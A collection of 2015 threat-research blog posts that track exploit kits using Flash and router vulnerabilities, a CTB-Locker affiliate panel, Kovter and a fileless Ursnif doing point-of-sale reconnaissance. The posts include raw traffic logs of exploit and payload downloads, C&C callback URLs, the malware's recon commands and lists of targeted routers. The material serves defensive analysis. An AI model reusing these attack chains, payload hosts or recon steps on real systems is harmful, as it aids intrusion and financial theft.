NB : the exploit does not seems really reliable. I won't detail for obvious reasons.

Read More :
CVE-2015-0336 Nuclear EK - FireEye - 2015-03-19
Nuclear EK leverages recently patched Flash vulnerability - Malwarebytes - 2015-03-19

---

CVE-2015-0359 (Flash up to 17.0.0.134) and Exploit Kits

April 24, 2015, 10:28 am

≫ Next: Another look at Niteris : post exploitation WMI and Fiddler checks

≪ Previous: CVE-2015-0336 (Flash up to 16.0.0.305) and Exploit Kits

$

0

0

As spotted by FireEye on 2015-04-17, Angler EK is now taking advantage of a vulnerability patched with the last version of Flash Player ( 17.0.0.169 )

Angler EK :
2015-04-17

Angler EK successfully exploiting CVE-2015-0359 2015-04-24

Flash Sample from this pass : ff7685252e2a353b10543df90214f1a948a554947323b07078c18e9f6a810373
Fiddler sent to VT

"Standalone" Neutrino-ish :
2015-04-27
Thanks to Malwarebytes Anti-Exploit team for referer
Thanks to Timo Hirvonen for CVE identification

Same CVE as Angler used in "Standalone" mode - 2015-04-27 IE11 - Win7 Flash 17.0.0.134

Traffic source : adxpansion on porn website
Sample (Viagra/Cialis badvert) : c14c1130796167bbe0172dda86adec4ff3dcc34a81451f285795b81c2abd4983
Fiddler : sent on VT

This drop a js in %temp% or %temp%\low that do the rc4 and call

wscript executing the js  in another case  Badvert :  403cba4b81d235b5b53912c4b68995c7 (you can see the RC4 key used)

http://pastebin.com/raw.php?i=6qdTEBnj
Note the 6 minutes sleep :)

Dropped malware : You can get them here.
Tofsee maybe : a29acacfc2b5e44cdbfb769ce9cf9ccf
Trapwot fake av (defender pro 2015) : 37cd5cb1ebabcb921fe20341c2a63fc4
Undefined : 2e297279f7d919e4e67464af91fb6516

Drops in %temp%

One more :

Neutrino-ish malvert 2015-04-30 cf :  https://twitter.com/BelchSpeak/status/593803410207612928 Fiddler sent to VT (password : malware)

Those drop were so "Neutrino-ish" that i decided to take a look at neutrino in same conditions and guess what :

Neutrino :
2015-04-27
Thanks to Timo Hirvonen for CVE identification

Same CVE as Angler used in "Standalone" mode - 2015-04-27 IE11 - Win7 Flash 17.0.0.134

Sample : d7a44f7794f8f0ba972c41d30d1e47d3232b32b45292ac9c9c9d8d338814f3d3
Fiddler sent to VT

Nuclear Pack :
2015-04-28
Thanks to TrendMicro for confirming CVE was the same as the one used in Angler EK

Nuclear Pack successfully exploiting Flash 17.0.0.134 inside IE11 on Windows 7 to push Kelihos Loader (suba002) 2015-04-28

NB: some Nuclear Pack instances are still only firing CVE-2015-0335.
Sample : 6eca6686bf2450d6251add82f5f5681e6c542575acf350f21efede628c6be6fe
Fiddler sent to VT

RIG :
2015-04-30
Thanks @TimoHirvonen for CVE confirmation.
RIG now

Sample was : a345a866f64fb61e482ead7e3b3979542381b579c6065ffd7e93bc23faefdd4c
Fiddler sent to VT

To those wondering why i do not give direct link to exploit patched less than one month ago, look at these stats shared by a user on underground :

RIG stats (mostly BR) shared by a user underground

Magnitude:
2015-04-02

Magnitude successfully exploiting CVE-2015-0359 to push Cryptowall and Zemot 2015-05-02

Sample in that pass : 85e0f358c80e9013be2358e4ee11d90885d74f5b32d4cef710b76e0245631b26

Fiddler sent to VT

Fiesta:
2015-05-03

Logo Courtesy of Fox-IT Fiesta firing CVE-2015-0359 (more like the real one accorting to @TimoHirvonen) 2015-05-03

Sample in that pass : a78f2cd9233523141fc29960831947ad9f993e08680f2db10facf2ed93a7e94e
Fiddler sent to VT
Read more :
Latest Flash Exploit in Angler EK Might Not Really Be CVE-2015-0359 - 2015-04-22 - Peter Pi - TrendMicro
Angler EK Exploiting Adobe Flash CVE-2015-0359 with CFG Bypass - 2015-04-18 - Dan Caselden and Sai Omkar Vashisht - FireEye

Another look at Niteris : post exploitation WMI and Fiddler checks

May 12, 2015, 2:41 pm

≫ Next: An Exploit Kit dedicated to CSRF Pharming

≪ Previous: CVE-2015-0359 (Flash up to 17.0.0.134) and Exploit Kits

$

0

0

In this post we'll see some of the improvements that have been brought to Niteris.
Disclaimer : Few configuration were tested, so most probably some added/replaced CVEs are missing.

The infection chain (should be clean now) :

Infection chain leading to Niteris 2015-05-07 (probably 5 months old)

is the same as the one that has been used on eHow

You'll notice that the actors registered 20min .eu for the first redirect of traffic from 20min .ch,
v5-static.ehowcdn .biz to mimic v5-static.ehowcdn .com, etc...

VT Pdns from first redirector in the infection chained

Compromised eHow redirection chain to Nuclear Pack pushing Dyre - 2015-05-05

and on LiveStrong recently :

Compromised LiveStrong redirecting to same infection chain/payload as eHow - 2015-05-06

which are probably compromised since at least end of 2013 and where CVE-2013-5330 was first encountered...


Obviously Niteris has evolved  on the Exploit integration side.

CVE-2014-0569 :

Niteris  firing code to exploit CVE-2014-0569

Flash Sample : 22ea8dd623c0f44e352ac7f3618a918b1f52a14552eec6c2d10ce0ff744bb66f

CVE-2014-6332 :

Niteris firing code to exploit CVE-2014-6332

Sent code : http://pastebin.com/raw.php?i=2hU1kDi6
Code after js deobfuscation : http://pastebin.com/B5ihgFgv
Code after vbs deobfuscation : http://pastebin.com/wrBeGxzM

CVE-2015-0311 :

Niteris successfully exploiting CVE-2015-0311 to push Ursnif 2015-05-07

Flash Sample : d438be33030b2ed20a3db52031e110034119111cb116ab58bd393da49d6d0efe

CVE-2015-0336 :

Incomplete pass of Niteris Firing CVE-2015-0336 2015-05-04

Flash Sample : d3a08acd97ee8f9d9fe0e530e34c42bb7d6e78c89021725393116bd5b5907df2

but here are some less expected stuff  :

CVE-2013-1710 &  CVE-2012-3993 (Firefox Exploit - seems to be an implementation of this metasploit module)

Niteris sending code to exploit CVE-2013-1710 &  CVE-2012-3993 2015-05-07

Post exploitation AntiVM / Fiddler :

Niteris call for post exploitation checks Note fake user agent. 2015-05-07

Sent code : http://pastebin.com/mCu7AzGh
Code after js deobfuscation : http://pastebin.com/UV51KECp
Code after vbs deobfuscation :  http://pastebin.com/VE4L48cz

So after exploitation some WMI checks are made to gather data on the system (Security Center, running processes...)

Niteris Checks based on WMI query and read of Fiddler default error on non resolving domains 2015-05-07

If Niteris spot that you are running Fiddler or inside a VM, you'll be dropped before gathering the payload.

Here you can see a Virtualbox using Fiddler as proxy sending data to the EK

Niteris after close() function post Data showing that it has  spotted both VirtualBox and Fiddler (outside of the VM) 2015-05-07

Fiddler Side note :
Looking at the customrules.js you'll read that this function "OnReturningError(oSession: Session)" executes just before Fiddler returns an error.
This is where the Niteris check can be defeated by modifying the response.

In the deofuscated code,we can see the decoding routine :

Payload decoding routine Xor (key [g_xk] : 97dc6e7aaa9c089d0ed82ebfd9fca4fe) skipping 0 and matching bytes

The script is also using WMI to ensure the payload has been properly executed

Niteris routine to ensure payload is running as expected 2015-05-07

Once done a call back (with post data ) is made to the EK
(contains Model and Security products. They should be able to figure out when an Antivirus Vendor is catching them, the same way Antivirus Vendor are able to figure out when they miss an EK : no more hits in the telemetry :D)

Files: Niteris_2015-05-12.zip.

Thanks to @UnicornSec for the working Referer
Special thanks to @DarienHuss for the impulse and help!
Thanks to @TimoHirvonen (F-Secure)  for flash CVE identification.

Read More :

Meet Niteris EK (formerly known as CottonCastle) - 2014-06-09

An Exploit Kit dedicated to CSRF Pharming

May 22, 2015, 7:15 am

≫ Next: On the other side of CTB-Locker : the Affiliate server.

≪ Previous: Another look at Niteris : post exploitation WMI and Fiddler checks

$

0

0

In april, studying a redirector that was previously associated with some (RIP) Sweet Orange activity, I landed on a TDS that was strangely denying usual driveby criteria (US,EU, JP,... Internet Explorer, Firefox...).

A try with Android did not give better result. Trying with Chrome I was expecting a "Browlock" ransomware but instead I got what looks like a CSRF (Cross-Site Request Forgery) Soho Pharming  (a router DNS changer)

The code ( http://pastebin.com/raw.php?i=TsEUAJtq )  was easy to read. The DNS written in clear, some exploits. I decided not to look in details.

But when i faced those redirections one month later, there was many improvement including some obfuscation.

The traffic brought to it when active is a 6 figure one

1 Week of traffic to the "router Exploit Kit"

Geo Repartition of the Chrome traffic 2015-05-16

With my first  pass I only got those call :

Router EK - Dodged client : reason bad network configuration 2015-05-12

The landing is calling CryptoJS AES encoding.

RouterBF - Landing - 2015-05-12 featuring some CryptoJS AES encoding

This call :

GET http://ngwblnlfmvjazwf17swal1tn5qqjbx.informationdrommers .xyz:81/track/e_x.js
200 OK (application/javascript)

is the implementation of Daniel Roesler's webrtc-ips which allow local and public IP adresses gathering via STUN requests. (Demo proposed by @diafygi)

STUN calls generated by the "Router EK" captured in Wireshark 2015-05-18 (note: that pass was successfull - cf local IP range)

Once decoded the AES encoded piece of code was like :

Decoded piece of the landing. We can see some router fingerprinting by image path and size. Some IP range condition (otherwise redirect to : "about:blank"

Few days later the code moved again

Landing was smaller, some AES encoded strings were moved to separated calls :
/stat/dnd.php
/stat/gcd.php?l=1

The router list was improved :

more than 55 routers from a dozen of brands

Here is the list on the 2015-05-18 :

ASUS AC68U

ASUS RTN56U & ASUS RTN10P & ASUS-RTN66U & ASUS-RT56-66-10-12

ASUS-RTG32

BELK-PHILIPS (?)

BELKIN F5D7230-4

BELKIN F5D8236-4V2

BELKIN F9k1105V2

BELKIN-F5D7231-4

BELKIN-F5D7234-4

D'LINK DIR-600

D'LINK DIR-604

D'LINK DIR-645

D'LINK DIR-810L & DIR-826L & DIR-615 & DIR-651 & DIR-601 & WBR1310 & D2760

D'LINK DSLG604T

D'LINK-DIR-2740R 

EDIMAX BR6208AC

LINKSYS BEFW11S4 V4

LINKSYS L120

LINKSYS WRT54GSV7

LINKSYS-BEFW11S4 V4

LINKSYS-LWRT54GLV4

LINKSYS-WRT54GV8

LINKSYS-X3000

LINSYS L000

Medialink WAPR300N

Microsoft MN-500

NETGEAR DGN1000B & DG834v3 & DGN2200

NETGEAR WNDR3400

NETGEAR-DGN1000 & NETGEAR-DGN2200

NETGEAR-WNR834Bv2

NETGEAR-WPN824v3 

NETIS WF2414

Netis WF2414

TENDA 11N

TPLI ALL

TPLI-WR940N & WR941ND & WR700

TRENDNET E300-150

TRIP-TM01 

TRIP-TM04

Trendnet TW100S4W1CA

ZYXEL MVR102

ZYXEL NBG416

ZYXEL-NBG334W

New features to detect devices on the client machine and fingerprint it using a fork of this script :
https://github.com/muaz-khan/DetectRTC/blob/master/DetectRTC.js

Data gathered by the KIT via DetectRTC

Example of DetectRTC result reply before encoding and passed as parameter

With those information on how to get attacked, I moved the VM to an "accepted" IP-range and faked owning a targeted router :

DNSChanger EK tricking Chrome to exploit a D'LINK (CVE-2015-1187) then change DNS (to 185.82.216.86)  and reboot

Knowing CVE-2015-1187  has been released on 2015-03-02 i guess this attack is pretty effective ( the % of router updated  in the past two months is probably really low)


Here is the code sent in an AES encoded form for the D'LINK attack

D'LINK attack instructions - 2015-05-18

Looking at the code it seems we can say CVE-2008-1244 is there.
(note that Router are not updated automatically, so while we hardly see some >3 years old CVE in Browser Exploit Pack, for router this might still be relevant), CVE-2013-2645 might be here as well. We can bet there are a lot more buried in the post commands dedicated to some of the models.

I made a pass for some Linksys :

The DNSChanger EK  trying to perform a dictionnary attack on a LinkSys WRT54G 2015-05-18

For the Microsoft MN500 :

A Router EK  trying to perform a bruteforce attack on a Microsoft MN500 2015-05-18

2 more (Asus and Edimax) are shared at the end

I made another pass today, and saw an additionnal call :

A router EK 2015-05-22 - one more call, another DNS Server.

DNS are now changed to : 217.12.202.93 (previously it was :  185.82.216.86, and earlier 37.139.50.45 - quite surely some others have been used ). Always Google DNS as failover to avoid raising alarm if something goes wrong with the first IP.

We know they can do : bank/webmoney MITM, phishing, adfraud etc...but to the question : "what are they doing ?"... I have no reply yet (if you figure out, i'd be more than happy to get a mail :) )


ThanksWill Metcalf (Emerging Threats) for his help.

Files :RouterBF_2015-05-22.zip (5 fiddlers, some piece of decoded js)

Read more :
Large-scale DNS redirection on home routers for financial theft - 2014-02-06 - Cert-PL
[PDF] : Soho Pharming 2013 - Team Cymru's TIG
[PDF Whitepaper]: Drive-By Pharming - 2006-12-13 - Sid Stamm (Indiana University, Bloomington) - Zulfikar Ramzan (symantec) - Markus Jakobsson (Indiana University, Bloomington)

On the other side of CTB-Locker : the Affiliate server.

May 25, 2015, 1:49 am

≫ Next: CVE-2015-3090 (Flash up to 17.0.0.169) and Exploit Kits

≪ Previous: An Exploit Kit dedicated to CSRF Pharming

$

0

0

If you do not know what is CTB-Locker (aka Critroni) take a look at : "Crypto Ransomware" CTB-Locker (Critroni.A) on the rise (where you'll find the Advert as well)

Hosted on tor : ctbservermurt37p.onion

CTB-Locker affiliate server - Home

CTB-Locker affiliate - Price rules

CTB-Locker affiliate - Payouts

CTB-Locker affiliate - Stats

CTB-Locker affiliate - Installs

CTB-Locker affiliate - Get exe (so both on tor)

CTB-Locker affiliate - Support

CTB-Locker affiliate - User Messages (empty here)

CTB-Locker - API

Thanks a lot to @Trojan7Sec for sharing the location of the server.

Read more :
CIRCL TR-33 Analysis - CTB-Locker / Critroni - Circl.Lu - 2015-02-17
CTB-Locker payload obfuscation layers analysis - Christophe Rieunier
 "Crypto Ransomware" CTB-Locker (Critroni.A) on the rise - 2015-04-18

CVE-2015-3090 (Flash up to 17.0.0.169) and Exploit Kits

May 26, 2015, 7:00 pm

≫ Next: Fast look at Sundown EK

≪ Previous: On the other side of CTB-Locker : the Affiliate server.

$

0

0

As spotted by FireEye Angler EK is now exploiting CVE-2015-3090 patched with Flash 17.0.0.188

Angler EK :
2015-05-26

Only in few instances for now.

Angler EK successfully exploiting Flash 17.0.0.169 on Windows 7 running Internet Explorer 11 to push Bedep and an Adfraud module. 2015-05-27

Sample in that pass : 6cb6701ba9f78e2d2dc86d0f9eee798a

Fiddler sent to VT

Read more :

Angler EK Exploiting Adobe Flash CVE-2015-3090 - 2015-05-26 - Sai Omkar Vashisht, Corbin Souffrant, Yasir Khalid, Dan Caselden - FireEye

Fast look at Sundown EK

June 8, 2015, 11:56 am

≫ Next: CVE-2015-3105 (Flash up to 17.0.0.188) and Exploit Kits

≪ Previous: CVE-2015-3090 (Flash up to 17.0.0.169) and Exploit Kits

$

0

0

Sun Down - Top Gun

Disclaimer : There is nothing worth a post there...except mentionning this EK is around.
I would put that "kit" in the same sad basket than Archie (same level, same kind of traffic source)

The exploit kit is out there since middle of April. I first heard about it by Will Metcalf from Emerging Threats.

Studying the TDS in front of it we concluded that this specific thread was focused on Japan, hence the name Will Metcalf decided to give. Please note that obviously this was only one thread and many are focused on other country or are even not delivery path "geo-locked".

TL:DNR
----
It has code to exploit :
CVE-2013-7331, CVE-2014-6332, CVE-2014-0569, CVE-2014-0556, CVE-2015-0311, CVE-2015-0313 , uses vbe
Powershell and IE dependant.
No decision tree : carpet bombing.
No locking feature yet (IP/Geo...etc - has to be done in front of it)
----
In one image :

Sundown EK 2015-06-08

----------------
GET http://dessawert.co .vu/?9a91fd589e97ce5c007615a4de72a74d7e8ffd
200 OK (text/html) Landing in Carpet bombing mode.

Sundown Landing - 2015-06-08

GET http://dessawert.co .vu/SDDS2/asddfs.php
200 OK (text/html)

GET http://dessawert.co .vu/JKHFLKJDGHBRKLJFGDBJHRFDGTBERHJKTERBHJ3/665h311.swf
200 OK (application/x-shockwave-flash) 9c58582d688b228f7e6aa7c81977fe39 CVE-2015-0311

GET http://dessawert.co .vu/JKHFLKJDGHBRKLJFGDBJHRFDGTBERHJKTERBHJ3/es6L313.swf
200 OK (application/x-shockwave-flash) dfa724814e82af648737e8bb59dd76d8 CVE-2015-0313

GET http://dessawert.co .vu/JKHFLKJDGHBRKLJFGDBJHRFDGTBERHJKTERBHJ3/asdt17.swf
200 OK (application/x-shockwave-flash) 8ae899555cd88b89e4762fb5653d1633 CVE-2014-0569

GET http://dessawert.co .vu/JKHFLKJDGHBRKLJFGDBJHRFDGTBERHJKTERBHJ3/street1.php
200 OK (text/html)

GET http://dessawert.co .vu/JKHFLKJDGHBRKLJFGDBJHRFDGTBERHJKTERBHJ3/5Z9T14.swf
200 OK (application/x-shockwave-flash) 37f0844c742e8ecd32cdfbaa290fed61 CVE-2014-0556

GET http://dessawert.co .vu/JKHFLKJDGHBRKLJFGDBJHRFDGTBERHJKTERBHJ3/street2.php
200 OK (text/html) CVE-2013-7331 and Wscript ActiveX

CVE-2013-7331 once decoded

GET http://dessawert.co .vu/JKHFLKJDGHBRKLJFGDBJHRFDGTBERHJKTERBHJ3/street3.php
200 OK (text/html)  Wscript ActiveX

GET http://dessawert.co .vu/JKHFLKJDGHBRKLJFGDBJHRFDGTBERHJKTERBHJ3/street4.php
200 OK (text/html)  CVE-2014-6332

GET http://msiurgfhjrlsuhgfrslihkj.co .vu/SDDS2/d.php?d=EDWEDRFEDDF-3.exe
200 OK (Application/octet-stream) e0c925d1a0c5c7022bfb00ab8b63628e Payload

GET http://dessawert.co .vu/url.php
200 OK (text/html)
----------------
Note : you can use : ayra.ch VBScript encoder and decoder to decode those :
#@~^XXXXXX== [Stuff] ==^#~@
Login Screen :

Sundown - Customer login Screen

Sundown - Panel

Files : Fiddler and Piece of code.
Thanks :  Will Metcalf and Fox-IT for inputs/intel

CVE-2015-3105 (Flash up to 17.0.0.188) and Exploit Kits

June 16, 2015, 9:36 am

≫ Next: CVE-2015-3113 (Flash up to 18.0.0.160) and Exploit Kits

≪ Previous: Fast look at Sundown EK

$

0

0

Spotted by TrendMicro, Magnitude is now exploiting CVE-2015-3105 patched with Flash 18.0.0.160

Magnitude :
2015-06-16

Magnitude Successfully exploit Flash 17.0.0.188 in IE11 on Windows 7 and pushes 2 Cryptowall 2015-06-16

Flash Sample in that pass : 58d1022923950ad1452c72f46b1ee3d0
Fiddler sent to VT

Angler EK :
2015-06-17
Thanks Kaspersky for CVE identification

Angler EK successfully exploit Flash 17.0.0.188 in IE11 on Windows 7 and executes bedep in Memory 2015-06-17

Flash sample in that pass :   ae3b7af878a4a53e93d8af479bc508dd Another one : 695e17f2d0bf19633c820aaa4ec3d126
Fiddler sent to VT.

Read More :

Magnitude Exploit Kit Uses Newly Patched Adobe Vulnerability; US, Canada, and UK are Most At Risk - 2015-06-16 - Peter Pi - TrendMicro

---

CVE-2015-3113 (Flash up to 18.0.0.160) and Exploit Kits

June 27, 2015, 3:13 pm

≫ Next: Kovter AdFraud is updating Flash Player

≪ Previous: CVE-2015-3105 (Flash up to 17.0.0.188) and Exploit Kits

$

0

0

Patched four days ago (2015-06-23) with Flash 18.0.0.194, the CVE-2015-3113 has been spotted as a 0day by FireEye, exploited in limited targeted attacks.  It's now making its path to Exploit Kits

Magnitude :
2015-06-27

Magnitude successfuly exploiting Flash 18.0.0.160 on IE11 in Windows 7 on 2015-06-27 Dropping 2 instances of Cryptowall Ransomware

Sample in that pass :
SWF : ee3f5baf3abfcdab044fccf89ec41746
FLV : 12965c39fdc1772c0e966b17d9bc66f4
Fiddler sent to VT

Angler EK :
2015-06-29

Angler EK exploiting Flash 18.0.0.160 on IE11 in Windows 7 the 2015-06-29 Dropping Kelihos Loader suba002.

Sample in that pass : c0050df92453cb74bc67156f955f16af
Fiddler sent to VT.

Nuclear Pack:
2015-07-01

Nuclear Pack exploit CVE-2015-3113 - 2015-07-01

Sample in that pass : fe02162a66d69390387546da10f471ac
Fiddler sent to VT

RIG :
2015-07-01

RIG exploiting CVE-2015-3113 - 2015-07-01

Sample in that pass : acddddb999edeb9188ebc3e6b0177854

Fiddler sent to VT

Neutrino :
2015-07-01

Neutrino takes advantage of CVE-2015-3113 - 2015-07-01

Sample in that pass: f6ad811cd610b97fba4be4d1cb554fd7
Fiddler sent to VT

Read More :
Operation Clandestine Wolf – Adobe Flash Zero-Day in APT3 Phishing Campaign - 2015-06-23 - FireEye
New Adobe Zero-Day Shares Same Root Cause as Older Flaws - 2015-06-24 - Peter Pi - TrendMicro

Kovter AdFraud is updating Flash Player

July 2, 2015, 7:41 pm

≫ Next: A fileless Ursnif doing some POS focused reco

≪ Previous: CVE-2015-3113 (Flash up to 18.0.0.160) and Exploit Kits

$

0

0

Checking my systems I noticed multiple VM trying to grab last version of Flash and thought they were not properly setup allowing Flash Player to auto-update (which we do not want obviously - we want to keep them exploitable and also avoid behavioural/network noise).

Looking a little more carefully, i understood that this was in fact Kovter tied activity.

Screenshot of Cuckoo Behavioural tab Process Tree - DllHost has been injected by Kovter

And when this Flash updating started ? In my systems the 2015-06-29 it seems.

Screenshot of a search in Moloch Pcap Indexer

The goal is most probably to close the door of the system to additional infection via DriveBy.

Note : This ( closing to others the door used to get inside ) is not a new idea/concept at all.

Betabot - Option to "protect from future infection via Exploit Kits" 2014-07

But the timing is interesting.

----
I asked help for the reverse part.
So I have been confirmed it was Kovter activity. The config (see : http://pastebin.com/NjZtv8GR ) includes those Flash update calls.
Kovter seems to have evolved a lot lately. Version 2.0.3.5 right now.
The big list of IPs might be a peer node list (P2P inside?)
----
PS: since Kovter is now distributed in Affiliate mode, it can be dropped in almost any vector, so any kind of Exploit Kit. Here it was Fiesta:

Kovter dropped by Fiesta - 2015-07-02 Updating Flash Player :)

but you'll find it dropped by  Angler :

Malvertising chain to Kovter via Angler EK 2015-07-02

Nuclear Pack :

Nuclear Pack dropping Kovter and Tinba /in0odrfqwbio0sa/ 2015-04-26

Neutrino :

Neutrino dropping Kovter 2015-06-03

or as a task in botnet  (Example : this smokeloader  [updopeserver .eu] or in some bedep (id:6001) instances )

Files: Kovter_2015-07-02.zip

Thanks :
Mieke Verburgh (Malwarebytes) and Horgh for help.
For the tools : Moloch, Cuckoo, Brad Spengler from Accuvant and Will Metcalf from Emerging Threats

Read More :
Kovter: Ad Fraud Trojan - 2015-01-16 - Cyphort Labs

A fileless Ursnif doing some POS focused reco

July 5, 2015, 12:31 pm

≫ Next: CVE-2015-5119 (HackingTeam 0d - Flash up to 18.0.0.194) and Exploit Kits

≪ Previous: Kovter AdFraud is updating Flash Player

$

0

0

Mission Impossible via Brixe63

At begining of June, I noticed a "different" Angler pass.
No drop and Ursnif call backs.

FileLess Angler Pass and Ursnif Callback

Mon, 01 Jun 2015 14:48:06 GMT

I already encountered that "small ursnif" multiple time. In november for instance some 18ko sample pushed in Bedep 380278c243a03c70dba89af2e6d4916f (grabbing a sample doing some IAP like callback - 43fce12aace6e73fc7b1e1117595816e )

Ursnif sent to Bedep infected VM

2014-11-07

and few days later : ff1da0bbfc66762dbc1b2af52425f211

C&C calls in november 2014 :

GET http://ipsalomenatep58highwayroad .biz:8080/photoLibrary/?user=c54acfbc9b5eef3b729f4025c17cefa2&id=1&ver=105&os=170393861&os2=512&host=0&k=1859056880&type=1
200 OK (text/html)

GET http://ipsalomenatep58highwayroad .biz:8080/photoLibrary/?user=c54acfbc9b5eef3b729f4025c17cefa2&id=1&ver=105&os=170393861&os2=512&host=0&k=1039729551&type=505
200 OK (text/html) < 2ndStage payload

What is new in that June pass is the Fileless execution of this Ursnif. In that context seeing it making some net view and registry CurrentVersion\Uninstall check

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s /v DisplayName > C:\Users\[REDACTED]\AppData\Local\Temp\28096234.TMP"
cmd /C "net.exe view > C:\Users\[REDACTED]\AppData\Local\Temp\28097562.TMP"

before calling C&C made me think this might be reco.

XTea decoded from the PCAP the sample I got was :
a619632af465759a3d3d45f39f988c3f
Running it manually i got him to grab (call &type=505) an Andromeda

Fileless Ursnif calling C&C, Grabbing Andromeda.

Andromeda Calling home.

Upon deeper looks it appears that this Ursnif is doing those kind of checks :

Case one :
- POS/SALE/STORE in the Netview output
- some URL in the cache :

choiceadvantage.com
uhauldealer.com
secure-booker.com
teletracker.com
wupos.westernunion.com
pay1.plugnpay.com
secure.paymentech.com/iterminal/

Case two :
- some entries in the registry :
VeriFone (advertises itself as the "global leader in secure electronic POS solutions")
(there are 2 strings Citrix and XenApp but do not seems to be directly called)

Case three :
- None of these..so "lower value" (for them) machine.

I made some modif in my systems to fall in case one :

Trying to get the attention of the Fileless Ursnif

And as expected it's something else than Andromeda that got dropped (c&c call with &type=555) on the machine

76c240311df959961200a20f52b4026c which appears to be a signed

Signed Dll dropped by the Fileless Ursnif

 and decided to stand on the drive version of itself.

Conclusion: another smart use of the fileless capabilities of Angler.

Side Note:
It seems type 666 and type 922 are other accepted call by the C&C (one of them might be Verifone case)

Crafted C&C Calls - note:  type 666 and 922

Fiddler for those who can decrypt the traffic based on the Key is in the package (i'd be happy to hear about it )

Here is a package (multiple samples/pcap/fiddler)

Thanks :
Will Metcalf, Horgh_RCE and FoxIT for help/inputs.

CVE-2015-5119 (HackingTeam 0d - Flash up to 18.0.0.194) and Exploit Kits

July 7, 2015, 3:38 pm

≫ Next: CVE-2015-5122 (HackingTeam 0d two - Flash up to 18.0.0.203) and Exploit Kits

≪ Previous: A fileless Ursnif doing some POS focused reco

$

0

0

As we are all aware, a 0d (for which a patch is expected tomorrow) was part of the files leaked from the HackingTeam compromission.

Flash 0day from #HackingTeam with a nice readme. Works very well on Chrome etc. http://t.co/nfqck54YhTpic.twitter.com/8uAQuUIXGV

— webDEViL (@w3bd3vil) July 6, 2015

As we were all expecting, integration in exploit kits was a matter of hours and it looks like Angler EK team is at it.

Angler EK :
2015-07-07
[Got confirmation from Kaspersky that this is indeed HT 0d]
[Sad Edit 2015-07-09] NB : If you see no credits here, it's because despite what you might read here or there...there was absolutely no mention anywhere of this CVE in Angler at the time of the Tweet/Publishing. Dark souls are dark [/Sad Edit]

Angler EK successfully exploiting IE11, win7 x64 Flash 18.0.0.194 2015-07-07

Sample in that pass : 061c086a4da72ecaf5475c862f178f9d
(Out of topic payload : Rioselx.A 8adbb946d84f34013719a7d13fa4b437 which interestingly grab Qadars ( 5efd70a7b9aecf388ae4d631db765d77) as 2nd Stage)

[Edit 2015-07-08
Angler EK is trying to avoid IDS changing URI pattern.

Angler EK changes landing pattern drastically

Here are some :
viewtopic.php?z5wd=162&xk1t=07646&b=12
viewtopic.php?8je=13464&0=0&ef=508&y=8
viewtopic.php?9m3vs=19507&e6=627&jsqaa=72
viewtopic.php?SHY=926&l6j=26165&cJU1=6&G=1
viewtopic.php?q=149&c=989&CVE3=43&JV=96

]

Files: Fiddler  (password is malware)

Neutrino :
2015-07-07
As spotted by Malwarebytes

Neutrino successfully exploiting IE11, Win7x64, Flash 18.0.0.194 2015-07-07

Sample in that pass : 6d14ba5c9719624825fd34fe5c7b4297
(out of topic payload : bunitu bfc1801adf55818b7b08c5cc064abd0c )
Files:Fiddler (password is malware)

Nuclear Pack :
2015-07-07

Nuclear Pack successfully exploiting IE11, Win7x64, Flash 18.0.0.194 2015-07-07

Sample in that pass :  16ac6fc55ab027f64d50da928fea49ec
(Out of topic payload : Troldesh.a : 2e67ccdd7d6dd80b248dc586cb2c4843 )
Files:Fiddler (password is malware)

[Edit 2015-07-08]
Patch is Available

Flash 18.0.0.203 fixing CVE-2015-5119 is out.

Right now you're safe on all previously mentioned EK with it.
[/edit 2015-07-08]

Magnitude :
2015-06-08

Flash 18.0.0.194 exploited via CVE-2015-5119 in Magnitude 2015-08-08 (after Patch)

Sample in that pass : 313cf1faaded7bbb406ea732c34217f4
( Out of topic dropped: 5b85fae87c02c00c0c78f70a87e9e920 most probably Cryptowall)

Files:Fiddler (password is malware)

Read More :
Leaked Flash zero-day likely to be exploited by attackers - 2015-07-07 Symantec
(Google Translate) : Hacking Team attack code analysis Part 1: Flash 0day - 2015-07-07  - 360 Security
PSA: Flash Zero-Day Now Active in The Wild - 2015-07-07 - Malwarebytes
Hacking Team Flash Zero-Day Integrated Into Exploit Kits - 2015-07-07 - TrendMicro

CVE-2015-5122 (HackingTeam 0d two - Flash up to 18.0.0.203) and Exploit Kits

July 11, 2015, 8:57 am

≫ Next: CVE-2015-1671 (silverlight up to 5.1.30514.0) and Exploit Kits

≪ Previous: CVE-2015-5119 (HackingTeam 0d - Flash up to 18.0.0.194) and Exploit Kits

$

0

0

Another 0d ( Patch expected in the coming week) was part of the files leaked from the HackingTeam compromission.

#HackingTeam So you said everything was patched ? @Adobepic.twitter.com/ER56kb2oqI

— dummys (@dummys1337) July 10, 2015

Code was fast disclosed, integrated to MetaSploit and as we were all expecting again, integration in Exploit Kits was a matter of hours.

Angler EK:
2015-07-11
Thanks Peter Pi from TrendMicro for CVE Id confirmation

Flash 18.0.0.203 exploited by Angler EK via CVE-2015-5122 in Firefox 2015-07-11

Sample in that pass : fcecd6b624bb50301a17d5aa423e135d
(out of topic payload : bedep calling additional malware [ 44ddbe75d4bca0097f84005969d5e671 Andromeda C&C : - adm-serv.com - 5.255.67.108 -- df1a4963f1b40592cf416b3b70980071 - pony news.php - 46f4b368a761d76a7f6d08cbfccd9ab6 Zeprox.B C&C 92.63.88.8]- and performing adfraud )

Files: Fiddler (password is malware)

Read More :

CVE-2015-5122 - Second Adobe Flash Zero-Day in HackingTeam Leak - 2015-07-10 - Dhanesh Kizhakkinan - FireEye
Another Zero-Day Vulnerability Arises from Hacking Team Data Leak - 2015-07-11 - Peter Pi - TrendMicro